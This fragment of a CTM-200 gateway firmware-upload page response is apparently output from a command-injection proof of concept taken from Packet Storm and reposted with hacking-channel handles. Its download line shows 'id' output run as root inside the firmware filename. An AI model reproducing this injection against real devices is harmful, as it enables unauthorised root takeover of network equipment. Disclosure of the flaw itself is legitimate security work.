Pragma: no-cache
...
...
Firmware Management
Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!
Saving configuration ...
downloading firmware image: gid=0(root)/uid=0(root).tar
found image:
extracting image files
Verifying checksum of downloaded firmware image
Image checksum failed
OK
Done.
...
...
Proceed Changes
* » Save Configuration « X-WrtEnd user extensions for OpenWrt Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video